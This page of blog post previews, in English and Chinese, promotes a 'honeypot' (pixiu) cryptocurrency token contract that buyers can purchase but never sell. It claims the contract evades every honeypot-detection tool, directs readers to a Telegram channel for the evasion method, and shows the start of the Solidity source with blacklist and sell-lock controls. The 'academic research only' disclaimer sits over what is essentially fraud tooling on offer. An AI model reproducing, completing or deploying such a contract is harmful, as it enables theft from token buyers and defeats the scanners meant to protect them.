博文

目前显示的是 十一月, 2023的博文

Honeypot contract: Tokens that cannot be sold, publish the contract source code

图片
Communication and sharing. https://t.me/bit369com01 Disclaimer: The source code of this honeypot contract is published for the purpose of enhancing security awareness, limited to academic research, and the team will not be responsible for the loss of money caused by intentional use of others. What is a pixiu or honeypot contract? The so-called brave pan or honey pot contract is actually a special token contract, which can only be bought and cannot be sold through technical means. Some advanced contracts can even circumvent the detection, today let Xiaobian uncover the mystery of the Pixiu pan for you. Brave disc to achieve ideas The common realization idea on the market is to directly add logic to the 'transfer' method, but this old-fashioned method has long been recognized by the honeypot detection robot, and after hard research by the team, the honeypot contract that bypasses all detection means is finally realized. Suitable for eth, bsc, arb and all EVM-supporting chai...

貔貅盘过检测:蜜罐合约源码公布解密研究

图片
交流与共享。 https://t.me/bit369com01 免责声明: 本蜜罐合约源代码公布出来目的是提高安全防范意识, 仅限于学术研究, 故意使用造成他人金钱损失本团队概不负责. 什么是貔貅盘或蜜罐合约? 所谓貔貅盘或者叫蜜罐合约, 其实是一种特殊的代币合约, 通过技术手段使代币只能买进,不能卖出. 有些高级合约甚至能做到绕过检测, 今天就让小编为你揭开貔貅盘的神秘面纱. 貔貅盘实现思路 市面上常见的实现思路是直接在 transfer 的方法里添加逻辑, 但这种老套的方法早就被蜜罐检测机器人识别出来了, 经过团队刻苦研究, 终于实现了绕过所有检测手段的蜜罐合约.适合eth, bsc, arb等所有支持evm的链. 最新的实现方法采用evm虚拟机底层技术,从根本上绕过检测,具体实现方法可以联系文章开始与结尾的电报. 源代码研究 pragma solidity ^0.8.16; contract Token is ERC20, Ownable { IUniswapV2Router02 private constant ROUTER = IUniswapV2Router02(0x10ED43C718714eb63d5aA57B78B54704E256024E); address private constant BUSD = 0xe9e7CEA3DedcA5984780Bafc599bD69ADd087D56; mapping(address => bool) public isPair; mapping(address => bool) public isWhitelisted; mapping(address => bool) public isBlackListed; mapping(address => uint256) public totalSold; bool public isSellOpen; bool public isBuyOpen; bool public isTransferNotLocked; bool private _paused; uint256 private liqAddedTime; ...